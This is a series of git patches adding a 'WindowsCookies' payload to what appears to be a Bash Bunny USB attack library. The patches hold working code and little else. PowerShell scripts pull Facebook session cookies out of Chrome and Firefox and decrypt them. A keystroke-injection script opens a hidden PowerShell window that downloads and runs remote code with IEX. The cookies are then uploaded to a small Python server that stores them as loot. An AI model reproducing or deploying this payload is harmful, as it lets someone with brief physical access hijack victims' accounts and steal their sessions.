From 62f185e5ff3474ad2ea52f2bd02b0f49b910eb7d Mon Sep 17 00:00:00 2001 From: oXis Date: Fri, 17 Mar 2017 19:52:40 +0000 Subject: [PATCH 1/6] Add WindowsCookies payload --- payloads/library/WindowsCookies | 1 + 1 file changed, 1 insertion(+) create mode 160000 payloads/library/WindowsCookies diff --git a/payloads/library/WindowsCookies b/payloads/library/WindowsCookies new file mode 160000 index 00000000..de804da4 --- /dev/null +++ b/payloads/library/WindowsCookies @@ -0,0 +1 @@ +Subproject commit de804da450825bf6e47d824da0bff55e3864d01c From 55aeb316af7443cd65922f4f35f62681c0d838bf Mon Sep 17 00:00:00 2001 From: oXis Date: Fri, 17 Mar 2017 19:57:41 +0000 Subject: [PATCH 2/6] fix --- payloads/library/WindowsCookies | 1 - 1 file changed, 1 deletion(-) delete mode 160000 payloads/library/WindowsCookies diff --git a/payloads/library/WindowsCookies b/payloads/library/WindowsCookies deleted file mode 160000 index de804da4..00000000 --- a/payloads/library/WindowsCookies +++ /dev/null @@ -1 +0,0 @@ -Subproject commit de804da450825bf6e47d824da0bff55e3864d01c From 1ecaddbf55c68a1608b4a6919515a63957843cdc Mon Sep 17 00:00:00 2001 From: oXis Date: Fri, 17 Mar 2017 19:59:11 +0000 Subject: [PATCH 3/6] add WindowsCookies payload --- payloads/library/WindowsCookies/README.md | 18 +++++ .../WindowsCookies/get_facebook_cookies.ps1 | 65 +++++++++++++++++++ payloads/library/WindowsCookies/payload.txt | 48 ++++++++++++++ 3 files changed, 131 insertions(+) create mode 100644 payloads/library/WindowsCookies/README.md create mode 100644 payloads/library/WindowsCookies/get_facebook_cookies.ps1 create mode 100644 payloads/library/WindowsCookies/payload.txt diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md new file mode 100644 index 00000000..ed037be7 --- /dev/null +++ b/payloads/library/WindowsCookies/README.md @@ -0,0 +1,18 @@ +# WindowsCookies for Bash Bunnys + +Author: oXis +Version: Version 1.0 +Credit: illwill, sekirkity, EmpireProject + +## Description + +Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession +Only works for Chrome on Windows. Tested on two different Windows 10 machines. +Only payload.txt is required, powershell script is here only if you want to modify it. + +## Payload LED STATUS + +| LED | Status | +| ---------------- | -------------------------------------- | +| Blue (blinking) | Payload init | +| Purple (blinking)| Done | diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 new file mode 100644 index 00000000..8233e8b6 --- /dev/null +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 @@ -0,0 +1,65 @@ +# Instructions: import the module, then perform the commanded needed. + +# Chrome Facebook cookies extraction +# Use: Get-FacebookCreds [path to Login Data] +# Path is optional, use if automatic search doesn't work + +function Get-FacebookCreds() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "datr is $DecPwd" + + # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "c_user is $DecPwd" + + # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "xs is $DecPwd" +} + +Get-FacebookCreds \ No newline at end of file diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt new file mode 100644 index 00000000..0e0a7281 --- /dev/null +++ b/payloads/library/WindowsCookies/payload.txt @@ -0,0 +1,48 @@ +#!/bin/bash +# +# Title: Facebook session cookies dump +# Author: oXis (inspired by illwill) +# Version: 1.0 +# +# Dumps the stored session cookies from Chrome browser by downloading a Powershell script +# then stashes them in /root/udisk/loot/FacebookSession/%ComputerName% +# Credits to these guys for their powershell scripts: +# https://github.com/sekirkity/BrowserGather BrowserGather.ps1 +# https://github.com/EmpireProject/Empire Get-FoxDump.ps1 +# Also credit to illwill for the BrowerCreds payload + +#script +# Blue...............Running Script +# Purple.............Got Browser Creds + +# QUACK SET_LANGUAGE gb +#DUCKY_LANG='fr' + +LED R 200 +LOOTDIR=/root/udisk/loot/FacebookSession +mkdir -p $LOOTDIR + +ATTACKMODE HID STORAGE +LED B 200 + +# wait 6 seconds for the storage to popup +Q DELAY 6000 +Q GUI r +Q DELAY 100 +Q STRING POWERSHELL +Q ENTER +Q DELAY 500 +Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) +Q ENTER +Q DELAY 100 + +#Dump Chrome Creds +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q ENTER +Q DELAY 100 +Q STRING exit +Q ENTER +Q DELAY 2000 + +sync +LED R B 200 \ No newline at end of file From 21abacc54f84ee11885db05e83dd6d15543862d5 Mon Sep 17 00:00:00 2001 From: oXis Date: Sat, 18 Mar 2017 12:09:34 +0000 Subject: [PATCH 4/6] add firefox support --- payloads/library/WindowsCookies/README.md | 4 +- .../WindowsCookies/get_facebook_cookies.ps1 | 51 +++++++++++++++++-- payloads/library/WindowsCookies/payload.txt | 4 +- 3 files changed, 53 insertions(+), 6 deletions(-) diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md index ed037be7..8714a9b2 100644 --- a/payloads/library/WindowsCookies/README.md +++ b/payloads/library/WindowsCookies/README.md @@ -6,8 +6,8 @@ Credit: illwill, sekirkity, EmpireProject ## Description -Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession -Only works for Chrome on Windows. Tested on two different Windows 10 machines. +Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession +Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines. Only payload.txt is required, powershell script is here only if you want to modify it. ## Payload LED STATUS diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 index 8233e8b6..c9214787 100644 --- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 @@ -4,7 +4,54 @@ # Use: Get-FacebookCreds [path to Login Data] # Path is optional, use if automatic search doesn't work -function Get-FacebookCreds() { +function Get-FacebookCreds-Firefox() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 24 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $datr = $PwdMatches.groups[1] + + "datr is $datr" + + # First the magic bytes for the facebook string, c_user size is 15 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $c_user = $PwdMatches.groups[1] + + "c_user is $c_user" + + # First the magic bytes for the facebook string, xs size is 44 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $xs = $PwdMatches.groups[1] + + "xs is $xs" +} + +function Get-FacebookCreds-Chrome() { Param( [String]$Path ) @@ -61,5 +108,3 @@ function Get-FacebookCreds() { "xs is $DecPwd" } - -Get-FacebookCreds \ No newline at end of file diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt index 0e0a7281..3a880a0b 100644 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt @@ -37,7 +37,9 @@ Q ENTER Q DELAY 100 #Dump Chrome Creds -Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q ENTER +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt Q ENTER Q DELAY 100 Q STRING exit From e60512e4a133640da38b8aa905999556853ba5e0 Mon Sep 17 00:00:00 2001 From: oXis Date: Sat, 18 Mar 2017 12:25:03 +0000 Subject: [PATCH 5/6] fix delay --- payloads/library/WindowsCookies/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt index 3a880a0b..271c33d4 100644 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt @@ -39,6 +39,7 @@ Q DELAY 100 #Dump Chrome Creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt Q ENTER +Q DELAY 200 Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt Q ENTER Q DELAY 100 @@ -47,4 +48,4 @@ Q ENTER Q DELAY 2000 sync -LED R B 200 \ No newline at end of file +LED R B 200 From 10966f7dc8666567f26e319b2a46ffc297f13269 Mon Sep 17 00:00:00 2001 From: oXis Date: Thu, 23 Mar 2017 20:18:37 +0000 Subject: [PATCH 6/6] New version, fully offline --- payloads/library/WindowsCookies/README.md | 9 +- .../WindowsCookies/get_facebook_cookies.ps1 | 30 +++-- payloads/library/WindowsCookies/p | 118 ++++++++++++++++++ payloads/library/WindowsCookies/payload.txt | 45 +++---- payloads/library/WindowsCookies/server.py | 33 +++++ 5 files changed, 194 insertions(+), 41 deletions(-) create mode 100644 payloads/library/WindowsCookies/p create mode 100644 payloads/library/WindowsCookies/server.py diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md index 8714a9b2..c5ff331b 100644 --- a/payloads/library/WindowsCookies/README.md +++ b/payloads/library/WindowsCookies/README.md @@ -1,18 +1,21 @@ # WindowsCookies for Bash Bunnys Author: oXis -Version: Version 1.0 +Version: Version 2.0 Credit: illwill, sekirkity, EmpireProject ## Description Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines. -Only payload.txt is required, powershell script is here only if you want to modify it. +Only payload.txt, server.py and p are required. +Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it. ## Payload LED STATUS | LED | Status | | ---------------- | -------------------------------------- | | Blue (blinking) | Payload init | -| Purple (blinking)| Done | +| White (blinking) | Setup RNDIS_ETHERNET | +| Green (blinking) | Done | + diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 index c9214787..b3eabccc 100644 --- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 @@ -34,21 +34,20 @@ function Get-FacebookCreds-Firefox() { $PwdMatches = $PwdRegex.Matches($BinaryText) $datr = $PwdMatches.groups[1] - "datr is $datr" - # First the magic bytes for the facebook string, c_user size is 15 $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' $PwdMatches = $PwdRegex.Matches($BinaryText) $c_user = $PwdMatches.groups[1] - "c_user is $c_user" - # First the magic bytes for the facebook string, xs size is 44 $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' $PwdMatches = $PwdRegex.Matches($BinaryText) $xs = $PwdMatches.groups[1] - "xs is $xs" + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" } function Get-FacebookCreds-Chrome() { @@ -82,9 +81,8 @@ function Get-FacebookCreds-Chrome() { # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + $datr = [System.Text.Encoding]::Default.GetString($Decrypt) - "datr is $DecPwd" # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' @@ -93,9 +91,8 @@ function Get-FacebookCreds-Chrome() { # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + $c_user = [System.Text.Encoding]::Default.GetString($Decrypt) - "c_user is $DecPwd" # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' @@ -104,7 +101,18 @@ function Get-FacebookCreds-Chrome() { # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + $xs = [System.Text.Encoding]::Default.GetString($Decrypt) + + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + + +function Payload() { + + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome)) + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox)) - "xs is $DecPwd" } diff --git a/payloads/library/WindowsCookies/p b/payloads/library/WindowsCookies/p new file mode 100644 index 00000000..b3eabccc --- /dev/null +++ b/payloads/library/WindowsCookies/p @@ -0,0 +1,118 @@ +# Instructions: import the module, then perform the commanded needed. + +# Chrome Facebook cookies extraction +# Use: Get-FacebookCreds [path to Login Data] +# Path is optional, use if automatic search doesn't work + +function Get-FacebookCreds-Firefox() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 24 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $datr = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, c_user size is 15 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $c_user = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, xs size is 44 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $xs = $PwdMatches.groups[1] + + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + +function Get-FacebookCreds-Chrome() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $datr = [System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $c_user = [System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $xs = [System.Text.Encoding]::Default.GetString($Decrypt) + + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + + +function Payload() { + + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome)) + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox)) + +} diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt index 271c33d4..d87ad3e2 100644 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt @@ -2,50 +2,41 @@ # # Title: Facebook session cookies dump # Author: oXis (inspired by illwill) -# Version: 1.0 +# Version: 2.0 # # Dumps the stored session cookies from Chrome browser by downloading a Powershell script -# then stashes them in /root/udisk/loot/FacebookSession/%ComputerName% +# then stashes them in /root/udisk/loot/FacebookSession/l # Credits to these guys for their powershell scripts: # https://github.com/sekirkity/BrowserGather BrowserGather.ps1 # https://github.com/EmpireProject/Empire Get-FoxDump.ps1 # Also credit to illwill for the BrowerCreds payload #script -# Blue...............Running Script -# Purple.............Got Browser Creds +# Blue..............Running Script +# White.............Setup RNDIS_ETHERNET +# Green.............Got Browser Creds +LED B 200 +source bunny_helpers.sh # QUACK SET_LANGUAGE gb -#DUCKY_LANG='fr' +DUCKY_LANG='fr' -LED R 200 LOOTDIR=/root/udisk/loot/FacebookSession mkdir -p $LOOTDIR -ATTACKMODE HID STORAGE -LED B 200 +ATTACKMODE HID -# wait 6 seconds for the storage to popup -Q DELAY 6000 +cd /root/udisk/payloads/$SWITCH_POSITION/ +./server.py & +sleep 1 + +#Dump Chrome Cookies Q GUI r Q DELAY 100 -Q STRING POWERSHELL +Q STRING "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\"" Q ENTER -Q DELAY 500 -Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) -Q ENTER -Q DELAY 100 -#Dump Chrome Creds -Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt -Q ENTER -Q DELAY 200 -Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt -Q ENTER -Q DELAY 100 -Q STRING exit -Q ENTER -Q DELAY 2000 +LED R G B 100 +ATTACKMODE RNDIS_ETHERNET -sync -LED R B 200 +LED G 100 diff --git a/payloads/library/WindowsCookies/server.py b/payloads/library/WindowsCookies/server.py new file mode 100644 index 00000000..977bb6d9 --- /dev/null +++ b/payloads/library/WindowsCookies/server.py @@ -0,0 +1,33 @@ +#!/usr/bin/python +from os import curdir +from os.path import join as pjoin + +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer +# from http.server import BaseHTTPRequestHandler, HTTPServer + +class StoreHandler(BaseHTTPRequestHandler): + store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l') + get_path = pjoin(curdir, 'p') + + def do_GET(self): + if self.path == '/p': + with open(self.get_path) as fh: + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(fh.read().encode()) + + def do_POST(self): + if self.path == '/l': + length = self.headers['content-length'] + data = self.rfile.read(int(length)) + + with open(self.store_path, 'a') as fh: + fh.write(data.decode() + "\n") + + self.send_response(200) + + +server = HTTPServer(('', 8080), StoreHandler) +server.serve_forever() +